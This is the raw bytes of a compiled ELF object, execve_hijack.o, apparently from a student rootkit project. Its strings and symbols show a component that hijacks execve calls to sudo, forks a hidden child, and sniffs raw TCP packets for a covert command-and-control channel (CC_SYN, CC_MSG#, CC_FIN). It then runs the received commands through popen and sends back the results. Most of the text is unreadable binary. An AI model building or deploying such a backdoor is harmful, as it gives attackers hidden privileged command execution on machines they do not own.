src/helpers/execve_hijack.o

ELF>PR@@<00><1E>UH<55><48>H<EFBFBD><48>`dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00><00>E<EFBFBD><45>}<7D><>u
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>E<EFBFBD>H<>E<EFBFBD>H<>U<EFBFBD><55>E<EFBFBD><45><00><00><><EFBFBD><00><><EFBFBD>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>r<EFBFBD><00><00><00>E<EFBFBD><45>}<7D><>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>SH<53>E<EFBFBD>H<>E<EFBFBD>H<>UЋE<D08B><45><00><00><><EFBFBD><00><><EFBFBD>u<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>U<EFBFBD><55>E<EFBFBD><45><EFBFBD>H<EFBFBD>=<00><00><00>H<>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u.H<>=<00>H<><00>jH<6A><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD>H<><48>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>@H<><00>8<EFBFBD>H<><48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>@<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǅ<EFBFBD><C785><EFBFBD><EFBFBD><00>0<EFBFBD><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD>ǅ<><C785><EFBFBD><EFBFBD><00><>ǅ<><C785><EFBFBD><EFBFBD><00>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<3B><><EFBFBD><EFBFBD><EFBFBD><0F>N<EFBFBD><4E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
H<>5<00><><EFBFBD>H<>=<00>H<><48> <20><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48> <20><><EFBFBD>H<EFBFBD><48>u#<23><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	H<>5<00><><EFBFBD><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48> <20><><EFBFBD>H<EFBFBD>pH<>E<EFBFBD><45>H<>¿<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48>P<EFBFBD><50><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<>
QA<51>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08><>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD>`<60><><EFBFBD><EFBFBD><EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD><EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD>H<><48>0<EFBFBD><30>y0<79><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǅ<><C785><EFBFBD><EFBFBD><00><>H<>E<EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<>=<00>H<>E<EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><08><><EFBFBD>H<EFBFBD>5<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><08><><EFBFBD><0F>OH<><48><08><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><>uH<>=<00>ǅ<><C785><EFBFBD><EFBFBD><00>H<><48><08><><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD><EFBFBD><00><00>H<><48><18><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD>CC_MSG#H<>H<><48><10><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><08><><18><><EFBFBD>A<EFBFBD>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>H<><48>0<EFBFBD><30>y-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>OH<4F><48><18><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD>H<EFBFBD><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>7<EFBFBD><37><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>H<>M<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48>AWAVAUATSH<53><48><EFBFBD><00>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD><48>x<EFBFBD><78><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>=<00><00>E<EFBFBD><00>1<EFBFBD>E<EFBFBD>H<EFBFBD>H<EFBFBD><14>H<>E<EFBFBD>H<01>H<EFBFBD><10>E<EFBFBD><45><EFBFBD>H<EFBFBD>=<00><00><00>E<EFBFBD><01>E<EFBFBD>;E<>|<7C><><00><><0F><><00>E<EFBFBD><45><EFBFBD>Hc<48>H<EFBFBD><48>H<>U<EFBFBD>Hc<48>H<EFBFBD><48>`<60><><EFBFBD>Hǅh<C785><68><EFBFBD>Hc<48>H<EFBFBD><48>P<EFBFBD><50><EFBFBD>HǅX<C785><58><EFBFBD>H<>H<EFBFBD><14><00>H<><48>Hл<00>H<><48>Hk<48>H<><48>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48>H)<29>H9<48>tH<><48>H<><48>$<24><00><>H<EFBFBD><EFBFBD><C281>H)<29>H<EFBFBD><EFBFBD><C281>H<><48>t%<25>H<><48>H<01>H<EFBFBD>H<><48>H<EFBFBD><48>H<><48>H<><48>H<>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>H<>H<>E<EFBFBD>H<EFBFBD>H<>PH<>E<EFBFBD>H<EFBFBD>H<>¾H<>=<00><00>H<>E<EFBFBD>H<EFBFBD>@H<>¾H<>=<00><00><00>E<EFBFBD><00>Y<EFBFBD>E<EFBFBD>H<EFBFBD>H<EFBFBD><14>H<>E<EFBFBD>HЋU<D08B><55><EFBFBD>H<>H<>E<EFBFBD>Hc<48>H<EFBFBD>ЋE<D08B><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD>ЋU<D08B><55>JH<><EFBFBD>H<EFBFBD>=<00><00><00>E<EFBFBD><01>E<EFBFBD>;E<>|<7C><>E<EFBFBD><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD><04>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00><>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><00>E<EFBFBD><45>}<7D>yH<>=<00><00>}<7D><0F><><00><00><00><>H<EFBFBD>=<00><00><00><><00>BH<>=<00><00><00>E<EFBFBD><45>}<7D>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>E<EFBFBD><45><00><><EFBFBD><00><><EFBFBD>u0<75><00><00><>uH<>=<00><00>H<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>U<EFBFBD>H<EFBFBD>M<EFBFBD><4D>E<EFBFBD>H<EFBFBD>Ή<EFBFBD><CE89>H<>=<00><00><00><00>E<EFBFBD>H<EFBFBD><48>H<EFBFBD><48>Hc<48>H<EFBFBD><48>H<>U<EFBFBD>Hc<48>I<EFBFBD><49>A<EFBFBD>Hc<48>I<EFBFBD><49>A<EFBFBD>H<>H<EFBFBD><14><00>H<><48>Hо<00>H<><48>Hk<48>H<><48>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48>H)<29>H9<48>tH<><48>H<><48>$<24><00><>H<EFBFBD><EFBFBD><C281>H)<29>H<EFBFBD><EFBFBD><C281>H<><48>t%<25>H<><48>H<01>H<EFBFBD>H<><48>H<EFBFBD><48>H<><48>H<><48>H<>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>PH<>E<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD>H<>5<00><00><00><00>E<EFBFBD><00>`<60>E<EFBFBD>H<EFBFBD>H<EFBFBD><48>H<><14>H<>E<EFBFBD>HЋU<D08B><55><EFBFBD>H<>H<>E<EFBFBD>Hc<48>H<EFBFBD>ЋE<D08B><45>PH<>E<EFBFBD>Hc<48>H<EFBFBD>ЋU<D08B><55><EFBFBD>H<><48>H<EFBFBD>5<00><00><00><00>E<EFBFBD><01>E<EFBFBD><45><EFBFBD>9E<39>|<7C><>E<EFBFBD><45>P<EFBFBD>H<EFBFBD>E<EFBFBD>Hc<48>H<EFBFBD><04>H<>E<EFBFBD>H<EFBFBD><48>H<>H<><48>x<EFBFBD><78><EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD><00><>yH<>=<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>H<>=<00><00>H<><48>H<EFBFBD>]<5D>dH+%(t<05>H<>e<EFBFBD>[A\A]A^A_]<5D>Timer %i started, address sent %llx
rFailed to run commandCOMMAND ERRORRESULT OF COMMAND: %s
	
Sniffing...
Running hijacking processCC_SYNFailed to open rawsocket
Sniffed
IP: %s
CC_ACKCC_MSG#Received client message#CC_FINConnection closed by requestReceived request: %s
Hello world from execve hijackerArgument %i is %s
sudo/home/osboxes/TFG/src/helpers/execve_hijackexecve ARGS%i: %s
/usr/bin/sudoFailed to execve()Fork failedI am the child with pid %d
/tmp/rootlogFailed to open lock file before entering hijacking routinelock file was lockedError with the lockfileChild process is exitinghijacking ARGS%i: %s
Failed to execve() originally hijacked processparent process is exiting%B
<02>9&I(Pint*@-9<03><19><03><1B><03>}<03><1A><03><1B><03>!<21><08><07><00>1<08>	3}	6	<09>	7	<09>	8	<09>	9	<09> 	:	<09>(	;	<09>0	<	<09>8	=	<09>@	@	<09>H	A	<09>P	B	<09>X	D<16>`	F<14>h	H}p	I}t	J<0B>x	MP<00>	NW<00>	O<08><00>	Q<0F><00>	Y
<0A><00>	[<17><00>	\<19><00>	]<14><00>	^	G<00>	_
-<00>	`}<00>	b<08><00><19>
+<08><08><0C><00>
9<08><08><08><0C><00>
9M<13><08>a<11><12>	
>		<0C>		<15><08>tm8
<08>	
	}	

}	
}	
}	

}	
}	
}	
}	
} 	
<0C>(	
<0F>0<08> 	
	*><0C>1
9
^
q
<14>
<14>P<08>	!o b<08>	d	<09>	e
E	f}	g}	h
E,<08>ihl/@0@tos7
8	8Did9D	:Dttl;
8	<
8		=D
	>P	?P]Pf%	hD	iD	j
<EFBFBD>	k
<EFBFBD>m
8n
8	t
8
	{D	|D	}D	<11>D	<11>Dseq<11>P	<11>P<11>D<11>Dfin<11>Dsyn<11>Drst<11>Dpsh<11>Dack<11>Durg<11>D<11>D	<11>D	<11>D	<11>Dd.<14>%bB@](<10>	<13>		<14>	
<0B>		}	<0B> <08>.
]<01>}J<01><><01>}<03><>~<01>E<03><>~<01>(E<03><>~pid<01><0B><03><><0B><04><>B]ii<01>
}<03><><00><00><01>	<04><>jii<01>}<03><><00><00>fd<01>
}<03><>tii
}<03><><0C>	 9<04><><0C>	 9<04><>q}6<01><>
q"}<03><>}q.E<03><>}!fdq:}<03><>}s
<03><>}t<11>
<03><>}x<0B><03><>}iiz	}<03><>}<01><0E><03><>~<01><0B><03><>}<01>
!<02>P<01><0E><03><>~<01>	}<03><>}<00>
jj<01>
}<03><>}<00><01><12><03><>~<01><0F><03><>}p<01><0F><03><>}res<01><17><03><>~<01><17><03><>~<01><1A><03><>K"Y<07><00><01>Z
<03><>}[<0B><03><>}\<03><>}]	}<03><>}<0C>
9<00><08>D<07><00><01>}D<1D><03><>wfpE<0B><03><>wresF<0B><03><>wbufG
}<03><>w<0C><00>#9<00>$ }<00><01>"<17><03><>""<22><02>@%#	}fd#}<03><>fd2#}<03><>now$<02>@&exp%\%%\&s&
<0A>%:;9I$>$>I&I:;9	
:;9I8
:;9<I
!I/:;9
:;9I
8
:;9I
8
:;9I8:;9:;9
I
I8>I:;9(.?:;9'I@<18>B:;9I4:;9I4:;9I4:;9I4:;9I !I/!:;9I".?:;9I@<18>B#!I/$.?:;9I@<18>B%4:;9I&4:;9I,B
7<00><01>
/usr/lib/gcc/x86_64-linux-gnu/10/include/usr/include/x86_64-linux-gnu/bits/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/x86_64-linux-gnu/sys/usr/include/asm-generic/usr/include/netinetlibexecve_hijack.cstddef.htypes.hstruct_FILE.hFILE.hstdio.htypes.htime_t.hstruct_timespec.hstruct_tm.hstruct_itimerspec.hint-ll64.hstdint-uintn.hin.hnetdb.hip.htcp.hRawTCP.htimerfd.h!	<01>
	<09>!g"<22>#<23>	<09>tYv!g#v$<24>	<09>tYw<08>Y<06>%wX<11>
[<08>	<09><10>	<09><08>
<08>[<08><0C>u<06>w<><16>\<08>	<09><12>Y	<09>=<3D>!<21><<05>"u=["<05><10>Y	Z
<EFBFBD>	/<1A>	<09>Kr.
<N
<08><05>Y<0E>/
<08><1F>
JKr<08><0F><	N z<08>t	 <08><08><17>Yt	Y<08><05><08> tJY<08>@+	K<08><10>	<09>
<EFBFBD>Y	/<0F>
<0A><08>u<10>XK"<22><11><08>%YY='<08>;<08>K<08><1C>v<>
h<><1D>!<0C>Y<06>/w&<05>
<0A>t//	<<08>J<08>X<01><01><02><01>	<01><08><08>	t/<f<8<03>
f"'	J<12>f<0C><08>
K<>	<09><11><08>	g<08>	<09>6Z	X1<08>
g<><67><0C>YtY<>
<0A>	<09>=<3D><05><0B><02><05>
%t/tf<F<03>	f *Jf\f<13><08><08>	K<><05><><0B><01>#__off_tshort int_IO_read_ptr_chaintm_hourdoffsize_t_shortbuf__uint8_tssize_t_IO_buf_baselong long unsigned intnew_value2th_urp_codecvtexecve_hijack.clong long intsigned charGNU C17 10.3.0 -mtune=generic -march=x86-64 -g -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_fileno_IO_read_endtot_lenpacket_thostnamelong intres1check_flags_wide_dataenvp_cur_columnhostentuint16_t_old_offset_offsetmainnew_value__uint32_tgetLocalIpAddresshost_entrytimeinfores2_IO_markerth_sporttm_yearunsigned ints_addr_freeres_bufcommandh_namefrag_off_IO_write_ptrtm_monpacket_ackrawtimetm_isdst__ssize_tit_interval_IO_save_baseh_addrtypewindow_lock_flags2_modeurg_ptr__uint64_tversionTFD_TIMER_CANCEL_ON_SEThij_argstm_minsourcetv_nsectimestritimerspecack_seqtm_ydaytv_sec__syscall_slong_tpayload_IO_write_enduint64_tth_wintcpheader_IO_lock_tlong unsigned int_IO_FILEdestpacket/home/osboxes/TFG/src/helpersth_offtime_tipheadertcphdrh_aliasesh_lengthh_addr_listprotocol_Boolunsigned charmax_exppayload_lengthlocal_ip_IO_buf_endsaddrconnection_close__pid_tth_flags_IO_wide_datain_addr_ttimespec_vtable_offsetiphdrFILEhostbuffer_markersth_ackpacket_respayload_buftm_wdaytcp_seqargsth_seq__u64long doublechar__uint16_tIPbuffer_IO_codecvt__off64_t_IO_read_basetot_exp_IO_save_endshort unsigned inttm_mdayth_sum__pad5__time_t_unused2tm_sectm_zoneth_dportuint8_t_IO_backup_baseremote_ipdaddrth_x2argcpid_t_freeres_listexecute_commandtest_time_values_injectionTFD_TIMER_ABSTIMEit_valueargv_IO_write_basehijacker_process_routineuint32_ttm_gmtoffin_addrGCC: (Ubuntu 10.3.0-1ubuntu1) 10.3.0GNU<00>zRx<08><00>E<10>C
<02><<00>E<10>C
<02>\<00>E<10>C
<02>|6E<10>C
-,<00>JE<10>C
P<><03><04><05><06>1<00><>
<00>,BQahy<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>6
":DZ<00>ipw|<00><00>J<00><00><00><00><00><00><00><00><00><00>execve_hijack.ctest_time_values_injection_GLOBAL_OFFSET_TABLE_timerfd_createtimerfd_settimeprintf__stack_chk_failexecute_commandcallocpopenputsstrcatfgetspclosegetLocalIpAddressgethostnameexitgethostbynameinet_ntoastrcpyhijacker_process_routinelocaltimeasctimewriterawsocket_sniff_patterninet_ntopbuild_standard_packetrawsocket_sendstrtokstrcmpfreeflockmaingeteuidexecveperrorforksetsidgetpid__errno_locationsyslogwait&
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>a<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>!F<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>^#c<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>j9<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>G<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>M<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>w<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>_<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>^<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:^A<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>l`s<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>b<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>o<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>9<00>C<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`<00>"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<00>1%<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?<00>I%<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>l<00>t&<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Z#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>t<00>{<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0$5<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aEk<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|*<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>U	Xc	d}	<00><00>	<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	<00><00>	<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	<00>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><
<00>A
+<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>L
<00>Q
,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>e
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>j
-<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>z
<00>
,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
